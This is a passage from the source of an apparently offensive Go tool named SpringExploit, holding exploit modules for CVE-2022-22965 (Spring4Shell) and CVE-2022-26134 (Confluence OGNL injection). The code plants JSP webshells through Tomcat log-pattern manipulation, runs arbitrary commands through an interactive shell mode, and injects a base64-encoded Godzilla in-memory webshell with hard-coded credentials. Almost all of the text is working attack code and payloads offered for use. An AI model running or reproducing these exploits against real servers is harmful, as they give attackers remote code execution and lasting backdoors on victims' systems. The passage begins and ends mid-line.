OutputStream%20arrOut%3Dnew%20java.io.ByteArrayOutputStream()%3Bf.equals(arrOut)%3Bf.equals(pageContext)%3Bf.toString()%3Bresponse.getOutputStream().write(x(arrOut.toByteArray()%2C%20true))%3B%7D%20%7Dcatch%20(Exception%20e)%7B%7D%25%7Bsuffix%7Di" 26 | file_date_data = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_" 27 | pattern_data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=" 28 | ) 29 | 30 | func (p CVE202222965) SendPoc(target string, hashmap map[string]interface{}) { 31 | shellname := utils.GetCode(6) 32 | time.Sleep(time.Second * 1) 33 | shellname1 := utils.GetCode(8) 34 | log.Debugf("shellname: %s", shellname) 35 | log.Debugf("shellname1: %s", shellname1) 36 | payload1 := body + context + body1 + shellname + body2 37 | rebeyond := body + beichen + body1 + shellname1 + body2 38 | //TODO implement me 39 | log.Debugf("[+] Running CVE202222965 poc") 40 | reqinfo := req2.NewReqInfo() 41 | reqmap := structs.Map(reqinfo) 42 | get_headers := map[string]string{ 43 | "suffix": "%>", 44 | "c": "Runtime", 45 | "prefix": "<%", 46 | "User-Agent": utils.GetUA(), 47 | } 48 | post_get_headers := map[string]string{ 49 | "User-Agent": utils.GetUA(), 50 | "Content-Type": "application/x-www-form-urlencoded", 51 | } 52 | 53 | reqmap["url"] = target 54 | 55 | // 默认配置 56 | reqmap["timeout"] = hashmap["Timeout"].(int) 57 | reqmap["retry"] = hashmap["Retry"].(int) 58 | reqmap["proxy"] = hashmap["Proxy"].(string) 59 | reqmap["mode"] = hashmap["Mode"].(int) 60 | reqmap["h1"] = hashmap["H1"].(bool) 61 | reqmap["redirect"] = hashmap["Redirect"].(bool) 62 | f := 0 63 | for f < 2 { 64 | time.Sleep(time.Second * 1) 65 | // 设置 payload 66 | reqmap["method"] = "POST" 67 | reqmap["body"] = file_date_data 68 | reqmap["headers"] = post_get_headers 69 | utils.Send(reqmap) 70 | 71 | if f == 0 { 72 | // 第二个请求 73 | //reqmap["body"] = payload1 74 | reqmap["body"] = rebeyond 75 | reqmap["headers"] = post_get_headers 76 | 77 | } else { 78 | reqmap["body"] = payload1 79 | reqmap["headers"] = post_get_headers 80 | } 81 | utils.Send(reqmap) 82 | // Changes take some time to populate on tomcat 83 | time.Sleep(time.Second * 3) 84 | if f == 1 { 85 | 86 | r, _ := url.Parse(target) 87 | log.Info("[+] CVE202222965 poc success") 88 | cmdshell := r.Scheme + "://" + r.Host + "/" + shellname + ".jsp" 89 | beichenshell := r.Scheme + "://" + r.Host + "/" + shellname1 + ".jsp" 90 | reqmap["url"] = cmdshell 91 | reqmap["method"] = "GET" 92 | reqmap["body"] = "" 93 | reqmap["headers"] = post_get_headers 94 | resp1 := utils.Send(reqmap) 95 | reqmap["url"] = beichenshell 96 | resp2 := utils.Send(reqmap) 97 | if resp1 != nil && resp2 != nil { 98 | if p.CheckExp(resp1, cmdshell, hashmap) && p.CheckExp(resp2, beichenshell, hashmap) { 99 | log.Info("[+] CVE202222965 poc success") 100 | res := target + " 可能存在CVE202222965没有进行验证 手动验证: " + r.Scheme + "://" + r.Host + "/" + shellname + ".jsp" + "?cmd=whoami or " + r.Scheme + "://" + r.Host + "/" + shellname1 + ".jsp 哥斯拉 pass key " 101 | log.Info(res) 102 | p.SaveResult(res, hashmap["Out"].(string)) 103 | } 104 | 105 | } 106 | 107 | } 108 | 109 | // 第三个请求 110 | reqmap["method"] = "GET" 111 | reqmap["body"] = "" 112 | reqmap["headers"] = get_headers 113 | utils.Send(reqmap) 114 | 115 | time.Sleep(time.Second * 1) 116 | reqmap["body"] = pattern_data 117 | reqmap["method"] = "POST" 118 | reqmap["headers"] = post_get_headers 119 | utils.Send(reqmap) 120 | f++ 121 | } 122 | } 123 | 124 | func (p CVE202222965) SaveResult(target string, file string) { 125 | err := utils.SaveToFile(target, file) 126 | if err != nil { 127 | log.Debugf("[-] Save result failed") 128 | log.Debugf(err.Error()) 129 | return 130 | } 131 | } 132 | 133 | func (p CVE202222965) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool { 134 | if resp.IsSuccess() { 135 | return true 136 | } 137 | return false 138 | } 139 | -------------------------------------------------------------------------------- /cmd/commons/poc/2022/CVE-2022-26134.go: -------------------------------------------------------------------------------- 1 | package _022 2 | 3 | import ( 4 | "fmt" 5 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 6 | resp2 "github.com/SummerSec/SpringExploit/cmd/commons/resp" 7 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 8 | "github.com/c-bata/go-prompt" 9 | "github.com/imroc/req/v3" 10 | log "github.com/sirupsen/logrus" 11 | ) 12 | 13 | const beichen26134 = "${#a=new javax.script.ScriptEngineManager().getEngineByName(\"js\").eval(@com.opensymphony.webwork.ServletActionContext@getRequest().getParameter(\"search\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Status\",\"ok\"))}" 14 | const memshell26134 = "search=var+classBytes+%3D+java.util.Base64.getDecoder%28%29.decode%28%22yv66vgAAADQBjwoAaADRCgBoANIJAEwA0wkATADUCADVCgAMANYHANcIANgHANkKANoA2woA2gDcBwDdCgDeAN8KAEwA4AoATADhBwDiCADjCADkCgAMAOUHAOYKAOcA6AgA6QoATADqCADrCgBMAOwKABQA7QgA7goADADvCgDnAPAIAPEKAOcA8ggA8woALwD0CgBMAPUHAPYKACMA0goAIwD3CgAjAPgHAKkKAEwA%2BQoADAD6BwD7CgAMAPwKACoA8AoAKgD9CACxBwD%2BCAC1CAD%2FCgEAAQEHAQIJAEwBAwoALwEECgAzAQUKAQABBgoBAAEHCAEICgEJAQoKAC8BCwoBCQEMBwENCgEJAQ4KAD0BDwoAPQEQCgAvAREIARIKAEwBEwgBFAoALwEVCQBMARYKAEwBFwoBGAEZCgEaARsKAEwBHAkATAEdBwGNCgAMAR8KAEwA0QoATAEgBwEhCgBQANIKAAwBIgoAFAD0CgAUASMHASQKAFUA0goAVQElCgBVASMKAEwBJgoAUAEnCACJCADGCAEoBwEpCgAvASoKAF4BKwoBGAEsCgBQAS0KAS4BLwoALwEwCgBeATEKAF4BMgoAFADSBwEzBwE0AQALaW5pdGlhbGl6ZWQBAAFaAQAEbG9jawEAEkxqYXZhL2xhbmcvT2JqZWN0OwEADHBheWxvYWRDbGFzcwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAIcGFzc3dvcmQBABJMamF2YS9sYW5nL1N0cmluZzsBAANrZXkBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAPTG1haW4vTWVtU2hlbGw7AQAGbG9hZGVyAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAMoKVYBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAbc2VydmxldFJlcXVlc3RMaXN0ZW5lckNsYXNzAQANU3RhY2tNYXBUYWJsZQcBjQcA5gcA3QcA1wcA2QcA4gEAEmdldFN0YW5kYXJkQ29udGV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAHcmVxdWVzdAEADnNlcnZsZXRDb250ZXh0AQALYWRkTGlzdGVuZXIBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nOwEACGxpc3RlbmVyAQAPc3RhbmRhcmRDb250ZXh0AQAhYWRkQXBwbGljYXRpb25FdmVudExpc3RlbmVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAApFeGNlcHRpb25zAQAGaW52b2tlAQBTKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABNzZXJ2bGV0UmVxdWVzdEV2ZW50AQAFcHJveHkBAAZtZXRob2QBAARhcmdzAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEADGludm9rZU1ldGhvZAEASyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAAm8xAQABaQEAAUkBAAdjbGFzc2VzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQADb2JqAQAKbWV0aG9kTmFtZQEACnBhcmFtZXRlcnMHAPYHAP4HAJgBABBnZXRNZXRob2RCeUNsYXNzAQBRKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQACY3MBABJbTGphdmEvbGFuZy9DbGFzczsHATUBAA1nZXRGaWVsZFZhbHVlAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAAlmaWVsZE5hbWUBAAFmAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwcA%2BwEADGdldFBhcmFtZXRlcgEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQANcmVxdWVzdE9iamVjdAEABG5hbWUBAA5nZXRDb250ZW50VHlwZQEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9TdHJpbmc7AQADYWVzAQAHKFtCWilbQgEAAWMBABVMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAFzAQACW0IBAAFtBwC8BwE2AQADbWQ1AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEACGJhY2tEb29yAQAVKExqYXZhL2xhbmcvT2JqZWN0OylWAQAIcmVzcG9uc2UBAAtwcmludFdyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEABmFyck91dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAARkYXRhAQAFdmFsdWUBAAtjb250ZW50VHlwZQEACDxjbGluaXQ%2BAQAKU291cmNlRmlsZQEADU1lbVNoZWxsLmphdmEMAHMAdAwAcwB8DABsAG0MAGoAawEAJmpha2FydGEuc2VydmxldC5TZXJ2bGV0UmVxdWVzdExpc3RlbmVyDAE3ATgBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAkamF2YXguc2VydmxldC5TZXJ2bGV0UmVxdWVzdExpc3RlbmVyAQAgamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb24HATkMAToBOwwBPAE9AQAPamF2YS9sYW5nL0NsYXNzBwE%2BDAE%2FAUAMAIcAiAwAiwCMAQATamF2YS9sYW5nL1Rocm93YWJsZQEALWNvbS5vcGVuc3ltcGhvbnkud2Vid29yay5TZXJ2bGV0QWN0aW9uQ29udGV4dAEACmdldFJlcXVlc3QMAUEBQgEAEGphdmEvbGFuZy9PYmplY3QHATUMAJIBQwEAEWdldFNlcnZsZXRDb250ZXh0DACZAJoBAAdjb250ZXh0DACrAKwMAUQBRQEAG2FkZEFwcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcgwBRgFCDAFHAUgBAAJvawwBSQFKAQAScmVxdWVzdEluaXRpYWxpemVkDAFLAUwMAMQAxQEAE2phdmEvdXRpbC9BcnJheUxpc3QMAU0BTAwBTgFPDACmAKcMAVABRQEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkDAFRAVIMAVMBVAEAEGphdmEvbGFuZy9TdHJpbmcBAANBRVMHATYMAVUBVgEAH2phdmF4L2NyeXB0by9zcGVjL1NlY3JldEtleVNwZWMMAHIAcQwBVwFYDABzAVkMAVoBWwwBXAFdAQADTUQ1BwFeDAFVAV8MAWABYQwBYgFjAQAUamF2YS9tYXRoL0JpZ0ludGVnZXIMAWQBWAwAcwFlDAFmAWcMAWgBSgEAEWdldFNlcnZsZXRSZXF1ZXN0DAC1ALYBACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQMAWkBagwAcABxDACxALIHAWsMAWwBbwcBcAwBcQFyDAC3ALgMAG4AbwEADW1haW4vTWVtU2hlbGwMAXMBPQwBdAF1AQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0MAXYAiAwBZgFKAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMAXcBeAwAwADBDAF5AWEBAAlnZXRXcml0ZXIBABNqYXZhL2lvL1ByaW50V3JpdGVyDAF6AXsMAXwBfQwBfgGADAGBAVgHAYIMAYMBhAwBegFnDAGFAHwMAYYAfAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAI2phdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YXgvY3J5cHRvL0NpcGhlcgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABdqYXZhL2xhbmcvcmVmbGVjdC9Qcm94eQEAEG5ld1Byb3h5SW5zdGFuY2UBAGIoTGphdmEvbGFuZy9DbGFzc0xvYWRlcjtbTGphdmEvbGFuZy9DbGFzcztMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7KUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQADYWRkAQAHdG9BcnJheQEAKChbTGphdmEvbGFuZy9PYmplY3Q7KVtMamF2YS9sYW5nL09iamVjdDsBAA1nZXRTdXBlcmNsYXNzAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQALZ2V0SW5zdGFuY2UBACkoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEACGdldEJ5dGVzAQAEKClbQgEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWAQAEaW5pdAEAFyhJTGphdmEvc2VjdXJpdHkvS2V5OylWAQAHZG9GaW5hbAEABihbQilbQgEAG2phdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdAEAMShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdDsBAAZsZW5ndGgBAAMoKUkBAAZ1cGRhdGUBAAcoW0JJSSlWAQAGZGlnZXN0AQAGKElbQilWAQAIdG9TdHJpbmcBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBAAt0b1VwcGVyQ2FzZQEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldERlY29kZXIBAAdEZWNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCREZWNvZGVyOwEAGGphdmEvdXRpbC9CYXNlNjQkRGVjb2RlcgEABmRlY29kZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAA5nZXRDbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsBAAtuZXdJbnN0YW5jZQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEABHNpemUBAAlzdWJzdHJpbmcBABYoSUkpTGphdmEvbGFuZy9TdHJpbmc7AQAFd3JpdGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAApnZXRFbmNvZGVyAQAHRW5jb2RlcgEAHCgpTGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcjsBAAt0b0J5dGVBcnJheQEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEABWZsdXNoAQAFY2xvc2UJAIEBFgEABHBhc3MIAYgJAIEBAwEAEDNjNmUwYjhhOWMxNTIyNGEIAYsBADdjb20vb3BlbnN5bXBob255L3h3b3JrL2I2OWE4MzdkODE4NjQ0YzU4OGJjM2VlNDgzMmRiYzQyAQA5TGNvbS9vcGVuc3ltcGhvbnkveHdvcmsvYjY5YTgzN2Q4MTg2NDRjNTg4YmMzZWU0ODMyZGJjNDI7ACEATABoAAEAaQAFAAoAagBrAAAACgBsAG0AAAAKAG4AbwAAAAoAcABxAAAACgByAHEAAAAOAAEAcwB0AAEAdQAAAD4AAgACAAAABiortwABsQAAAAIAdgAAAAoAAgAAABIABQATAHcAAAAWAAIAAAAGAHgBjgAAAAAABgB6AHsAAQABAHMAfAABAHUAAAFFAAYABgAAAFsqtwACsgADWUzCsgAEmgBBAU0SBbgABk2nAA9OEgi4AAZNpwAFOgQsxgAeKrgACrYACwS9AAxZAyxTKrgADSq3AA63AA9XpwAETQSzAAQrw6cACjoFK8MZBb%2BxAAUAEgAYABsABwAcACIAJQAJABAARgBJABAACgBQAFMAAABTAFcAUwAAAAMAdgAAAEYAEQAAABQABAAVAAoAFgAQABgAEgAaABgAIQAbABsAHAAdACIAIAAlAB4AJwAiACsAIwBGACcASQAlAEoAKABOACoAWgArAHcAAAAgAAMAHAALAH0AfgADABIANAB%2FAG8AAgAAAFsAeAGOAAAAgAAAAD4ACf8AGwADBwCBBwCCBwCDAAEHAIT%2FAAkABAcAgQcAggcAgwcAhAABBwCF%2BgAB%2BgAeQgcAhgADRAcAhvoABgACAIcAiAABAHUAAACeAAQAAwAAADISEbgABhISA70ADLYAEwEDvQAUtgAVTCorEhYDvQAUtwAXTSwSGLgAGRIYuAAZsEwBsAABAAAALgAvAAcAAwB2AAAAFgAFAAAAMAAXADEAIwAyAC8AMwAwADUAdwAAACoABAAXABgAiQBtAAEAIwAMAIoAbQACADAAAgB9AH4AAQAAADIAeAGOAAAAgAAAAAYAAW8HAIQAAgCLAIwAAgB1AAAAfQAGAAQAAAApLLYAGhIbBL0ADFkDEhRTtgAcTi0EtgAdLSwEvQAUWQMrU7YAFVcSHrAAAAACAHYAAAASAAQAAAA6ABMAOwAYADwAJgA9AHcAAAAqAAQAAAApAHgBjgAAAAAAKQCNAG0AAQAAACkAjgBtAAIAEwAWAI8AkAADAJEAAAAEAAEABwABAJIAkwACAHUAAACAAAIABQAAABkstgAfEiC2ACGZAA4tAzI6BCoZBLcAIgGwAAAAAwB2AAAAEgAEAAAAQgAMAEMAEQBEABcARgB3AAAANAAFABEABgCUAG0ABAAAABkAeAGOAAAAAAAZAJUAbQABAAAAGQCWAJAAAgAAABkAlwCYAAMAgAAAAAMAARcAkQAAAAQAAQAQAIIAmQCaAAEAdQAAATgABQAHAAAAY7sAI1m3ACQ6BC3GADMDNgUVBS2%2BogApLRUFMjoGGQbGABEZBBkGtgAatgAlV6cAChkEAbYAJVeEBQGn%2F9YqK7YAGiwZBAO9AAy2ACbAACfAACe3ACg6BRkFKy22ABWwOgQBsAABAAAAXgBfAAcAAwB2AAAAMgAMAAAASwAJAEwADQBNABcATgAdAE8AIgBQADAAUgA3AE0APQBWAFcAWABfAFkAYQBcAHcAAABSAAgAHQAaAJsAbQAGABAALQCcAJ0ABQAJAFYAngCfAAQAVwAIAJYAkAAFAAAAYwB4AY4AAAAAAGMAoABtAAEAAABjAKEAcQACAAAAYwCiAJgAAwCAAAAAKwAF%2FQAQBwCjAfwAHwcAgvoABvoABf8AIQAEBwCBBwCCBwCkBwClAAEHAIQAggCmAKcAAQB1AAAAuAADAAYAAAAhAToEK8YAGissLbYAEzoEAUyn%2F%2FI6BSu2AClMp%2F%2FoGQSwAAEABwARABQABwADAHYAAAAmAAkAAABfAAMAYAAHAGIADwBjABEAZgAUAGQAFgBlABsAZgAeAGgAdwAAAD4ABgAWAAUAfQB%2BAAUAAAAhAHgBjgAAAAAAIQCoAG8AAQAAACEAoQBxAAIAAAAhAKIAqQADAAMAHgCWAJAABACAAAAADQAD%2FAADBwCqUAcAhAkACQCrAKwAAgB1AAAA%2BAACAAYAAABCAU0qwQAqmQALKsAAKk2nACkBTiq2ABo6BBkExgAcGQQrtgArTQE6BKf%2F8ToFGQS2ACk6BKf%2F5SwEtgAsLCq2AC2wAAEAHgAoACsABwADAHYAAAA6AA4AAABrAAIAbAAJAG0AEQBvABMAcAAZAHEAHgBzACUAdAAoAHcAKwB1AC0AdgA0AHcANwB6ADwAewB3AAAAPgAGAC0ABwB9AH4ABQATACQAlgCQAAMAGQAeAKgAbwAEAAAAQgCgAG0AAAAAAEIArQBxAAEAAgBAAK4ArwACAIAAAAAYAAT8ABEHALD9AAcHAKoHAINRBwCE%2BQALAJEAAAAEAAEABwABALEAsgABAHUAAABRAAcAAwAAABMqKxIuBL0AFFkDLFO3ABfAAC%2BwAAAAAgB2AAAABgABAAAAfgB3AAAAIAADAAAAEwB4AY4AAAAAABMAswBtAAEAAAATALQAcQACAAEAtQC2AAEAdQAAAEMABAACAAAADyorEjADvQAUtwAXwAAvsAAAAAIAdgAAAAYAAQAAAIEAdwAAABYAAgAAAA8AeAGOAAAAAAAPALMAbQABAAEAtwC4AAEAdQAAANcABgAEAAAAKxIxuAAyTi0cmQAHBKcABAW7ADNZsgA0tgA1EjG3ADa2ADctK7YAOLBOAbAAAQAAACcAKAAHAAMAdgAAABYABQAAAIcABgCIACIAiQAoAIoAKQCLAHcAAAA0AAUABgAiALkAugADACkAAgB9AH4AAwAAACsAeAGOAAAAAAArALsAvAABAAAAKwC9AGsAAgCAAAAAPAAD%2FwAPAAQHAIEHAL4BBwC%2FAAEHAL%2F%2FAAAABAcAgQcAvgEHAL8AAgcAvwH%2FABcAAwcAgQcAvgEAAQcAhAAJAMAAwQABAHUAAACPAAQAAwAAADABTBI5uAA6TSwqtgA1Ayq2ADu2ADy7AD1ZBCy2AD63AD8QELYAQLYAQUynAARNK7AAAQACACoALQAHAAMAdgAAAAYAAQAAAI8AdwAAACAAAwAIACIAvQDCAAIAAAAwALsAcQAAAAIALgDDAHEAAQCAAAAAEwAC%2FwAtAAIHAKQHAKQAAQcAhAAAAgDEAMUAAQB1AAACYQAFAAsAAAEfKisSQgO9ABS3ABdNKiy2AENOLcYBAy0SRLYARZkA%2BiossgBGtgBHOgQZBMYA67gASBkEtgBJOgUqGQUDtgBKOgUZBcYA0xkFvp4AzbIAS8cAILsATFkstgAatgBNtwBOGQUDGQW%2BtgBPswBLpwCquwBQWbcAUToGsgBLtgBSOgcZBxkGtgBTVxkHLLYAU1cZBxkFtgBTVxkHtgBUV7sAVVm3AFayAEa2AFeyADS2AFe2AFi4AFk6CBkGtgBangBZLBJbuAAZEly4ABk6CSoZCRJdA70AFLcAF8AAXjoKGQoZCAMQELYAX7YAYBkKuABhKhkGtgBiBLYASrYAY7YAYBkKGQgQELYAZLYAYBkKtgBlGQq2AGanAAROpwAETbEAAgAMARYBGQAQAAABGgEdAAcAAwB2AAAAegAeAAAAkwAMAJcAEgCYAB8AmQApAJoALgCbADgAnABBAJ0ATACeAFIAnwBvAKEAeACiAIAAowCIAKQAjwClAJcApgCdAKcAuACoAMAAqQDNAKoA3gCrAOsArAEAAK0BDACuAREArwEWALcBGQC2ARoAuwEdALkBHgC8AHcAAABwAAsAzQBJAMYAbQAJAN4AOADHAMgACgB4AJ4AyQDKAAYAgACWAK4AbQAHALgAXgDAAHEACAA4AN4AywC8AAUAKQDtAMwAcQAEABIBBADNAHEAAwAMAQ4AiQBtAAIAAAEfAHgBjgAAAAABHwCUAG0AAQCAAAAAKgAG%2FwBvAAYHAIEHAIIHAIIHAKQHAKQHAL4AAPgApkIHAIb6AABCBwCEAAAIAM4AfAABAHUAAAA3AAIAAAAAABsTAYmzAYcTAYyzAYoDswAEuwAUWbcAZ7MAA7EAAAABAHYAAAAKAAIADAAMABAADQACAM8AAAACANABbgAAABIAAgEaARgBbQAJAS4BGAF%2FAAk%3D%22%29%3B%0D%0Avar+loader+%3D+java.lang.Thread.currentThread%28%29.getContextClassLoader%28%29%3B%0D%0Avar+reflectUtilsClass+%3D+java.lang.Class.forName%28%22org.springframework.cglib.core.ReflectUtils%22%2Ctrue%2Cloader%29%3B%0D%0Avar+urls+%3D+java.lang.reflect.Array.newInstance%28java.lang.Class.forName%28%22java.net.URL%22%29%2C0%29%3B%0D%0A%0D%0Avar+params+%3D+java.lang.reflect.Array.newInstance%28java.lang.Class.forName%28%22java.lang.Class%22%29%2C3%29%3B%0D%0Aparams%5B0%5D+%3D+java.lang.Class.forName%28%22java.lang.String%22%29%3B%0D%0Aparams%5B1%5D+%3D+java.lang.Class.forName%28%22%5BB%22%29%3B%0D%0Aparams%5B2%5D+%3D+java.lang.Class.forName%28%22java.lang.ClassLoader%22%29%3B%0D%0A%0D%0A%0D%0Avar+defineClassMethod+%3D+reflectUtilsClass.getMethod%28%22defineClass%22%2Cparams%29%3B%0D%0A%0D%0Aparams+%3D++java.lang.reflect.Array.newInstance%28java.lang.Class.forName%28%22java.lang.Object%22%29%2C3%29%3B%0D%0A%0D%0Aparams%5B0%5D+%3D+%22com.opensymphony.xwork.b69a837d818644c588bc3ee4832dbc42%22%3B%0D%0Aparams%5B1%5D+%3D+classBytes%3B%0D%0Aparams%5B2%5D+%3D+loader%3B%0D%0AdefineClassMethod.invoke%28null%2Cparams%29.newInstance%28%29%3B%0D%0A%22ok%22%3B%0D%0A" 15 | 16 | type CVE202226134 struct{} 17 | 18 | func (t CVE202226134) SendPoc(target string, hashmap map[string]interface{}) { 19 | 20 | reqmap := req2.NewReqInfoToMap(hashmap) 21 | reqmap["method"] = "GET" 22 | headers := map[string]string{ 23 | "User-Agent": utils.GetUA(), 24 | "Accept": "*/*", 25 | "Accept-Encoding": "gzip, deflate", 26 | } 27 | reqmap["headers"] = headers 28 | 29 | randStr := utils.GetCode(10) 30 | cmd := "echo " + randStr 31 | //cmd := "echo%20" + randStr + "%7c%62%61%73%65%36%34%20%2d%64" 32 | //cmd = "ifconfig" 33 | if hashmap["Shell"].(bool) { 34 | log.Info("[+] Start CVE-2022-26134 Shell Mode") 35 | th := prompt.Input("[+] Please input command: ", t.completer) 36 | if th == "" { 37 | th = "whoami" 38 | } 39 | cmd = th 40 | } 41 | payload := fmt.Sprintf("${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"%s\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"Host\",#a))}", cmd) 42 | payload, _ = req2.Encode(payload, "utf8") 43 | target1 := target + payload + "/" 44 | 45 | //log.Debug("[+] Target: ", target) 46 | reqmap["url"] = target1 47 | 48 | resp := utils.Send(reqmap) 49 | 50 | res := resp2.HandlerRespHeader(resp, "Host") 51 | if t.CheckExp(resp, target1, hashmap) { 52 | if res != "" { 53 | //res = utils.DecodeBase64String(res) 54 | log.Infof("[+] Success CVE-2022-26134 %s", target) 55 | if hashmap["Shell"].(bool) { 56 | log.Infof("[+] 命令执行结果: %s", res) 57 | log.Info("[+] End CVE-2022-26134 shell") 58 | } else { 59 | result := fmt.Sprintf(" %s 存在 CVE-2022-26134 漏洞, 可以使用 SpringExploit -u %s -p CVE202226134 -shell 进入交互式执行命令", target1, target1) 60 | t.SaveResult(result, hashmap["Out"].(string)) 61 | } 62 | } 63 | } 64 | 65 | reqmap["method"] = "POST" 66 | temp, _ := req2.Encode(beichen26134, "utf8") 67 | reqmap["url"] = target + temp + "/" 68 | reqmap["body"] = memshell26134 69 | resp1 := utils.Send(reqmap) 70 | isok := resp2.HandlerRespHeader(resp1, "X-Status") 71 | if isok != "" { 72 | result := fmt.Sprintf("%s 注入哥斯拉内存马成功,密码 pass key 哥斯拉如果连接不上请添加请求头 Connection: close 参考https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL ") 73 | t.SaveResult(result, hashmap["Out"].(string)) 74 | } 75 | 76 | } 77 | 78 | func (CVE202226134) SaveResult(target string, file string) { 79 | log.Info(target) 80 | err := utils.SaveToFile(target, file) 81 | if err != nil { 82 | log.Debugf("[-] Save result error: %s %s", target, err) 83 | return 84 | } 85 | } 86 | 87 | func (CVE202226134) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool { 88 | 89 | if !resp.IsSuccess() { 90 | return true 91 | } else { 92 | return false 93 | } 94 | 95 | } 96 | 97 | func (t 